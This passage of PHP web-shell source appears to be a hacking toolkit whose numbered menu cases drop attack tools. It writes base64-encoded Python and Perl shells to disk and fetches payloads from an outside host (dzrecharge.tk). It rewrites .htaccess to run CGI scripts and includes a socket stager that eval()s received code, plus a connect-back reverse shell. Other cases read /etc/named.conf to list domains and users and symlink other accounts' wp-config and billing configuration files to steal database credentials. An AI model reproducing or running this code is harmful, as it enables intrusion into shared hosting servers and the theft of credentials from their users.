- ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
- ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
- dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
- aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
- biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
- bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
- TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
- bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
- ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
- SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
- ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
- cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
- $file = fopen("python.izo" ,"w+");
- $write = fwrite ($file ,base64_decode($pythonp));
- fclose($file);
- chmod("python.izo",0755);
- echo "<iframe src=python/python.izo width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_9":
- mkdir('perltools', 0755);
- chdir('perltools');
- $perltoolss = 'PD9waHAKLyoKCiovCmVjaG8gIjxodG1sPjx0aXRsZT5JbXBvcnRlciBUMDBseiB2LjQ8L3RpdGxl
- PjxoZWFkPjxMSU5LIFJFTD0nU0hPUlRDVVQgSUNPTidIUkVGPSdodHRwOi8vd3d3LmhhY2stYm9v
- ay5uZXQvZmF2aWNvbi5pY28nPjwvaGVhZD4KPHN0eWxlPmE6bGluayB7dGV4dC1kZWNvcmF0aW9u
- Om5vbmU7fWE6aG92ZXIgeyAgICAgYm9yZGVyLWJvdHRvbTogMXB4IGRvdHRlZCAjYmEwMDAwO31h
- OnZpc2l0ZWQge3RleHQtZGVjb3JhdGlvbjpub25lO308L3N0eWxlPgo8Ym9keSB0ZXh0PScjRkYw
- MDAwJyBiZ2NvbG9yPScjMDAwMDAwJyBsaW5rPScjQ0NDQ0NDJyB2bGluaz0nIzgwODA4MCcgYWxp
- bms9JyM5OTk5OTknPjxkaXYgYWxpZ249J2NlbnRlcic+PGJyPgo8aW1nIGJvcmRlcj0nMCcgc3Jj
- PSdodHRwOi8vdXBsb2FkLnRyYWlkbnQubmV0L3VwZmlsZXMvbzhJOTk4MTAucG5nJyB3aWR0aD0n
- NTY2JyBoZWlnaHQ9JzI4Myc+PC9kaXY+Cjxmb250IGZhY2U9J3RhaG9tYScgc2l6ZT0nMicgY29s
- b3I9JyNmMzAwMDAnPjxicj48Yj48IS0tIGhhY2stYm9vay5uZXQgLS0+IjsKQHNldF90aW1lX2xp
- bWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHwgRV9OT1RJQ0UpOwokeD1hcnJheSggImh0
- LnR4dCI9PiIuaHRhY2Nlc3MiLCAiY2dpLW5ldy50eHQiPT4iY2dpLnIxeiIsICJkby1uZXcudHh0
- Ij0+ImRvbWFpbi5yMXoiLCAidXNlci50eHQiPT4idXNlci5yMXoiLCAiY28udHh0Ij0+ImNvbmZp
- Zy5yMXoiLCAic3ltLnR4dCI9PiJzeW1saW5rLnIxeiIsICJzcWwtbmV3LnR4dCI9PiJzcWwucGhw
- IiwgInI1Ny50eHQiPT4icjU3LnBocCIsICJjcGFuZWwudHh0Ij0+ImNwYW5lbC5waHAiLCAiZG9t
- YWlucy10eHQudHh0Ij0+ImRvbWFpbi5waHAiLCAiam9vbWxhLnR4dCI9PiJqb29tbGEucGhwIiwg
- IndwLnR4dCI9PiJ3cC5waHAiLCAiY29uZmlnLXBocC50eHQiPT4iY29uZmlnLnBocCIsICJpbmku
- dHh0Ij0+ImluaS5waHAiLCAidmIudHh0Ij0+InZiLnBocCIsICJpc3N3LnR4dCI9PiJpc3N3LnBo
- cCIsICJwbnB4LWluaS50eHQiPT4icGhwLmluaSIsICk7CmZvcmVhY2goJHggYXMgJGQ9PiR6KXsg
- JGZpbGUgPSBmb3BlbigkeiAsIncrIik7CiRyMHg9ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93
- d3cubXVzaWM0ZnVuLm9yZy9yMHgzZC9yMHgvJy4kZCk7CiR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUg
- LCRyMHgpOwpmY2xvc2UoJGZpbGUpOwppZigkd3JpdGUpeyBlY2hvICJbK10gV3JpdGVkIDogPGEg
- aHJlZj0nLi8keic+JHo8L2E+IDwvYnI+IjsKfWVsc2V7IGVjaG8gIlt+XSBDYW4ndCBXcml0ZSA6
- ICR6IDxicj4iOwp9CmNobW9kKCR6ICwgMDc1NSk7Cn0KZWNobyAiPC9iPjwvZm9udD48Yj48Yj48
- Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzInIGNvbG9yPScjQ0NDQ0NDJz48L2ZvbnQ+PC9iPjxm
- b250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMicgY29sb3I9JyM5OTk5OTknPjxiPjwvYj48IS0tIC9o
- YWNrLWJvb2submV0IC0tPjxicj48L2ZvbnQ+PC9iPjxwIGFsaWduPSdjZW50ZXInPjxmb250IGZh
- Y2U9J1RhaG9tYScgc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Jz48Zm9udCBjb2xvcj0nI0ZGRkZGRic+
- Q29kZWQgQnk8L2ZvbnQ+PGZvbnQgY29sb3I9JyNGRjAwMDAnPiBJcmFRaWFOLXIweCA8L2ZvbnQ+
- PGZvbnQgY29sb3I9JyNGRkZGRkYnPiB8PC9mb250Pjxmb250IGNvbG9yPScjRkYwMDAwJz4gPGEg
- aHJlZj0naHR0cDovL3d3dy5oYWNrLWJvb2submV0L3ZiLyc+d3d3LkhhY2stQm9vay5uZXQ8L2E+
- PC9mb250PjwvZm9udD48L3A+PHAgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nVGFob21hJyBz
- dHlsZT0nZm9udC1zaXplOiA5cHQnPkdyRUV0eiBUbzwvZm9udD48Zm9udCBmYWNlPSdUYWhvbWEn
- IGNvbG9yPScjRkZGRkZGJyBzdHlsZT0nZm9udC1zaXplOiA5cHQnPiBbI11+PC9mb250Pjxmb250
- IGZhY2U9J1RhaG9tYScgY29sb3I9JyNDQ0NDQ0MnIHN0eWxlPSdmb250LXNpemU6IDlwdCc+IEth
- cmFyIGFsU2hhTWk8L2ZvbnQ+PGZvbnQgZmFjZT0nVGFob21hJyBjb2xvcj0nI0ZGRkZGRicgc3R5
- bGU9J2ZvbnQtc2l6ZTogOXB0Jz58IEFuZCBBbGwgTXkgRnJpZW5kczwvcD48L2ZvbnQ+PGI+PGZv
- bnQgZmFjZT0nVGFob21hJyBzaXplPScyJyBjb2xvcj0nI0ZGRkZGRic+PC9odG1sPiI7CiMgZGVj
- cnlwdGVkOgojIGV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJ0RaUkh6cVJvQWdYM2M0cmFk
- WlZZNE9GRHJaNFJKdkdRMkFSeU04Sjc3emw5L3lkNFV1aEYvT2RYZnNUZDcvS3BoNktMdC94M0Vx
- ODVSZncveTlNeHkzLy9KV1EyS3V5MnhMNEV4NW96cFVNeDBsRGZ0UmM0ZlE0ZTI1R2kxQ0FCaE1F
- d0Juc3dwQnNNQW9rU1RIOUtrL3JRMEcxcW02b0xjTjFvUlgzb2NvZy85ZjJHNjh0NDJ0SHJzYW4x
- M1l0ZkJtenhDY1Jld05ablNDZ3FFK0o1RVB2bVVONktwbnJKREphdUNqTG05SThVSnE4NXVNcDdI
- Q2NuVk10emlGK2dKWWU2K05xdGdxbTg3azdWUHFmdmJkczZPWGoyV0F1dTdsMFJRdXZIRmk0bmF6
- cm1UZFZ2WFlLY2xQTjZnMkdkS292R2JYUmk3RW5sN295TjYzU1Myd0lkc3NydkgzRVEwK0tVUFk4
- d0QycHBVMGVnMVBEcU83ay81bXdiTkU2emVUTHRDV0ZYSW12cWs0dXFFZVpaT3BkUlMwU3BFRnFq
- TU04R2dTNkxQQXlMZ2VSYk9JTzA5c1lZdG16NjNKdk1sUWFmTFlPOTRBbVB2ZUhNVmg4OW1tRml6
- L21xem5MUWRXSGZRU2gya1loUVN4SkhwZ21oU2NZcWlFV1VtYXFDMWhWcWRCS2djYnBoOWRZN2lj
- NXdaTldiNy9KRkd3SnNnbC9rK081ZitlZEU3ZWtWZElGY0YvMytmSHhTdWJ3TlJiOXE1ZXlMUkNx
- Q0ZLR29yb0RTVTFYTkZkS0xUVVhhMmUxRlRnTlBnSmYrSUZCN3l4NitaNFZGVGRCM2Z5b3hLT21t
- cStSUnZ4TDVTSGdoNUJ5anN4Mjhrck92dHpXVjd3NEhxQ2lEUENGemZ6WnN5WHp2dFJxNmc0aUcz
- NmZpYU1GVUN0eVk0bzdwdXRzaHRDSkdid3gyblE1MzlUSGpaQlFWdWtrRy95SFYzV0h2c21CUHlL
- eHFVeEdyU1BFVjk1ajhwYWs4ZnJZeGFpSUtXako4d0pwM0Z1ZWZWZ2liTnhzK1drMWN0cXoyK3ZQ
- VjhtZE5tdEpvSFRGWXByVVE3dE9Fd1pzcVB6WFJta2VXU3VtcFJZTmZmUjQrNVRDWjFXUFlFUmZi
- VDAvbWRVaW9ibStPMlBHKzZDckoyNlZpeUJvRlM2dEFJZ2g1Sm1QM1BWYXdZSzVxUUc3VUJ5b2NX
- OHBOMTEvaW91blpjZWp0VkFHaEduUE51QVdLOWM1SmRIbmRtZ01CUjhpbjNUR2JxeTN6L1lrMFNs
- Zy9Jc2hHc0lsYjFNaVB1UmJCVWdRZnkrY3dyQ09HcUU0dHdKMkxXbTQ3cFJDTnljckl3Y0thczdC
- Q3Q3K2diRFozcXYvNDdNQTVyTmpKbExDRDJ6SzhCTUhObURROTRDMldpZ1hna0VTZnIzOWNnVyty
- Wlh5SmtweElKaU5NNTNGdTlBNG5vUWpUS0tUK1hHcUtaYXIyS0l2WVNOdkdZcjZYVVdvL3R4NFlS
- UWFKQ0RQNThKRHFkN1RCUFlwME9OZll4YnQ5Tit1ZGhyT2pIRk1BUXB4eFg3NWEvWVE0OG0waXZz
- dVk0UlhJVm9xcnZ0QW45UGVuRWZlcVAzMU0xTlhzV2hkZ3dwRWtDd21QYW0vbDFyZ3BNc2ZEZDJr
- a2dJU3pLTGQvNlFnak1yb2dEVjlhYkZ1TUhsU0wzOFdNTkFTeWlWREE3TzZOWnVLUXVQYzh5K0cx
- OU8rSFdJKytCOUlvZTVHcUdyYmoyTFdHdkNZNG56ZUlKWVdjZUpVTkQ5WXQvL0VhcmZxckloOVg1
- VC80RnZYOUt5RHNjanFhbXNOYWM4cWlvZzViaHdWMG5NaktIRzZqaUNvN21zSTlXNG1rVTUwaS9Y
- VE5NMGEwVENjWjl4TTl2aWJ5bWFyMzdkSGRUMHZaOHJWR0lYU1Z0dkZLbytTZDNKTEhLYjQ1emd5
- TUw4N0xHbm5IUDBjaXVmT2JQWElOeGliVnFvcEtZN2R2VVRCb3d2dGFWTnJUb2w3ZnBYTTA1a0Vn
- MVRPZW1oTXN1TTNBUHJvSnAyNTBmYTJhbk5ua0Z4dG9kYUlRU3ptYVJZeGZXanptT01nVEovNWFl
- VVVhczZLa2VZK1A0ckRCbVZUalhPcS9mMVpqcExGcFp6bTR5MUc3MHk0a0tXWG4wZU9DM3VWZVVn
- OGY0YktRQUM1Z21pRnBHSVpaOE05ZmYvNzgrZnZYLy83N0x3PT0nKSkpOwoKPz4=';
- $file = fopen("perlbypass.php" ,"w+");
- $write = fwrite ($file ,base64_decode($perltoolss));
- fclose($file);
- echo "<iframe src=perltools/perlbypass.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_10":
- mkdir('autoroot', 0755);
- chdir('autoroot');
- $file = fopen("autoroot.txt" ,"w+");
- $sa=file_get_contents('http://dzrecharge.tk/pv8L/1.txt');
- $write = fwrite ($file ,$sa);
- fclose($file);
- if ($write) {
- echo "The File Was Created Successfuly.</br>";
- }
- else {echo'"error"';}
- $chm = chmod("autoroot.txt" , 0755);
- if ($chm == true){
- echo "chmoded the file to 755";
- }else{
- echo "sorry file didn't chmoded";
- }
- break;
- case "PHP_11":
- mkdir('cgi', 0755);
- chdir('cgi');
- $file = fopen("jeentel" ,"w+");
- $sa=file_get_contents('http://dzrecharge.tk/pv8L/jeentel');
- $write = fwrite ($file ,$sa);
- chmod("jeentel",0777);
- $file = fopen("cgiPerl.dz" ,"w+");
- $sa=file_get_contents('http://dzrecharge.tk/pv8L/dz.txt');
- $write = fwrite ($file ,$sa);
- chmod("cgiPerl.dz",0755);
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "AddType application/x-httpd-cgi .dz
- AddHandler cgi-script .dz";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- echo "<iframe src=cgi/cgiPerl.dz width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_12":
- {
- $ipz =$_SERVER["REMOTE_ADDR"];
- $portz ="22";
- if ($ipz == "" && $portz == ""){echo "Please fill IP Adress & The listen Port";}
- else
- {
- $ipaddr = $ipz;
- $port = $portz;
- if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}
- if (is_callable('stream_socket_client'))
- {
- $msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");
- if (!$msgsock){die();}
- $msgsock_type = 'stream';
- }
- elseif (is_callable('fsockopen'))
- {
- $msgsock = fsockopen($ipaddr,$port);
- if (!$msgsock) {die(); }
- $msgsock_type = 'stream';
- }
- elseif (is_callable('socket_create'))
- {
- $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($msgsock, $ipaddr, $port);
- if (!$res) {die(); }
- $msgsock_type = 'socket';
- }
- else {die();}
- switch ($msgsock_type)
- {
- case 'stream': $len = fread($msgsock, 4); break;
- case 'socket': $len = socket_read($msgsock, 4); break;
- }
- if (!$len) {die();}
- $a = unpack("Nlen", $len);
- $len = $a['len'];
- $buffer = '';
- while (strlen($buffer) < $len)
- {
- switch ($msgsock_type)
- {
- case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
- break;
- case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
- break;
- }
- }
- eval($buffer);
- echo "[*] Connection Terminated";
- die();
- }
- }
- break;
- case "PHP_13":
- {
- $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
- $descriptorspec = array(
- 0 => array("pipe","r"),
- 1 => array("pipe","w"),
- 2 => array("file","/tmp/log.txt","a"));
- $ipx =$_SERVER["REMOTE_ADDR"];
- $portx ="22";
- $proto=getprotobyname("tcp");
- if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
- { die("[-] Socket Create Faile");}
- if(($ret=socket_connect($sock,$ipx,$portx))<0)
- { die("[-] Connect Faile");}
- else{
- $message="----------------------PHP Connect-Back--------------------\n";
- $message.="----------------------- SyRiAn Sh3ll --------------------\n";
- socket_write($sock,$message,strlen($message));
- $cwd=str_replace('\\','/',dirname(__FILE__));
- while($cmd=socket_read($sock,65535,$proto))
- {
- if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye Bye\n");exit;}
- else{
- $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
- if (is_resource($process)) {
- fwrite($pipes[0], $cmd);
- fclose($pipes[0]);
- $msg=stream_get_contents($pipes[1]);
- socket_write($sock,$msg,strlen($msg));
- fclose($pipes[1]);
- $return_value = proc_close($process);}
- }
- }
- }
- }
- break;
- case "PHP_14":
- echo "<title># Domains & Users</title>
- <style>
- body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
- A:link {text-decoration: none;color: red;}
- A:active {text-decoration: none;color: red;}
- A:visited {text-decoration: none;color: red;}
- A:hover {text-decoration: underline; color: red;}
- #new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
- tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
- </style>
- <p align=center># Domains & Users</p>
- <p align=center>Karar alShaMi t00l with PHP .. Maked By Lagripe-Dz ..?!</p><center>";
- $d0mains = @file("/etc/named.conf");
- if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
- echo "<table align=center border=1>
- <tr bgcolor=green><td>d0mains</td><td>users</td></tr>";
- foreach($d0mains as $d0main){
- if(eregi("zone",$d0main)){
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
- }}}
- echo "</table>
- <p align='center'>
- MaDe in AlGeriA 2o11 (r)
- </p>
- ";
- break;
- case "PHP_15":
- mkdir('ShowsourceRead', 0755);
- chdir('ShowsourceRead');
- $filexc = 'ZWNobyAiPGh0bWw+CjwvdGQ+PC90cj48L3RhYmxlPjxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlw
- ZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YScgPgo8L3RkPjwvdHI+PC90YWJsZT48Zm9ybSBtZXRob2Q9
- J1BPU1QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnID4KPGJyPgo8Yj5zaG93X3NvdXJj
- ZSAgOiA8L2I+PGlucHV0IHR5cGU9J3RleHQnIG5hbWU9J3Nob3cnIHZhbHVlPScnIHNpemU9JzU5
- JyBzdHlsZT0nY29sb3I6ICNmZmZmZmY7IGJvcmRlcjogMXB4IGRvdHRlZCByZWQ7IGJhY2tncm91
- bmQtY29sb3I6ICMwMDAwMDAnPjwvcD4KPGI+aGlnaGxpZ2h0X2ZpbGUgOiA8L2I+PGlucHV0IHR5
- cGU9J3RleHQnIG5hbWU9J2hpZ2gnIHZhbHVlPScnIHNpemU9JzU5JyBzdHlsZT0nY29sb3I6ICNm
- ZmZmZmY7IGJvcmRlcjogMXB4IGRvdHRlZCAjZmZmZmZmOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAw
- MDAwJz48L3A+CjxpbnB1dCB0eXBlPSdzdWJtaXQnJyAgdmFsdWU9J1JlYWQnICBzdHlsZT0nY29s
- b3I6IHJlZDsgYm9yZGVyOiAxcHggZG90dGVkIG9yYW5nZTsgYmFja2dyb3VuZC1jb2xvcjogZ3Jl
- ZW4nPjwvZm9ybTwvcD4KPC9mb3JtPC9wPiI7Cjw/cGhwCmlmKGVtcHR5KCRfUE9TVFsnc2hvdydd
- KSkKewp9CmVsc2UKewokcyA9ICRfUE9TVFsnc2hvdyddOwplY2hvICI8Yj48aDE+PGZvbnQgc2l6
- ZT0nNCcgY29sb3I9J3JlZCc+c2hvd19zb3VyY2U8L2ZvbnQ+PC9oMT4iOwokc2hvdyA9IHNob3df
- c291cmNlKCRzKTsKfQppZihlbXB0eSgkX1BPU1RbJ2hpZ2gnXSkpCnsKfQplbHNlCnsKJGggPSAk
- X1BPU1RbJ2hpZ2gnXTsKZWNobyAiPGI+PGgxPjxmb250IHNpemU9JzQnIGNvbG9yPSdncmVlbic+
- aGlnaGxpZ2h0X2ZpbGU8L2ZvbnQ+PC9oMT4iOwplY2hvICI8YnI+IjsKJGhpZ2ggPSBoaWdobGln
- aHRfZmlsZSgkaCk7Cn0KPz4=';
- $file = fopen("read.php" ,"w+");
- $write = fwrite ($file ,base64_decode($filexc));
- fclose($file);
- echo "<iframe src=ShowsourceRead/read.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_16":
- mkdir('configler', 0755);
- chdir('configler');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "AddHandler cgi-script .izo";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBl
- OiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9E
- VEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRt
- bDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3
- LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1M
- YW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5
- cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5bfl0gQ3li
- M3ItRFogQ29uZmlnIC0gW35dIDwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5l
- d1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQog
- Zm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRl
- cjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87
- DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7
- IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3Vy
- ZS5waHAnLCRrb2xhLictc2hvcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJs
- aWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpz
- eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xh
- LictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
- bWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGlu
- aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLicyLnR4dCcp
- Ow0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2Nv
- bmZpZy5waHAnLCRrb2xhLictZm9ydW0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
- cHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCRrb2xhLic1LnR4dCcpOw0Kc3ltbGluaygnL2hv
- bWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLic0LnR4dCcp
- Ow0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRr
- b2xhLictd3AxMy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9i
- bG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy9ob21l
- LycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLic2LnR4dCcpOw0K
- c3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywka29s
- YS4nNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0
- LnBocCcsJGtvbGEuJzgudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0
- bWwvbWtfY29uZi5waHAnLCRrb2xhLic5LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4n
- L3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGtvbGEuJzEyLnR4dCcpOw0Kc3ltbGlu
- aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcs
- JGtvbGEuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0
- bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9o
- b21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWlu
- Y2x1ZGVzLXZiLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3do
- bS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0xNS50eHQnKTsNCnN5bWxpbmsoJy9ob21l
- LycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdo
- bWMxNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9j
- b25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycu
- JHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1
- cHBvcnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmln
- dXJhdGlvbi5waHAnLCRrb2xhLicxd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2Vy
- LicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJy13aG1jczIudHh0Jyk7DQpz
- eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9u
- LnBocCcsJGtvbGEuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1
- YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7
- DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJh
- dGlvbi5waHAnLCRrb2xhLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIu
- Jy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmcu
- dHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25m
- aWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycu
- JHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5n
- LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teXNob3AvY29u
- ZmlndXJhdGlvbi5waHAnLCRrb2xhLictYmlsbGluZy50eHQnKTsgDQp9DQppZiAoJEVOVnsnUkVR
- VUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsn
- Q09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RS
- SU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAo
- QHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFt
- ZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFj
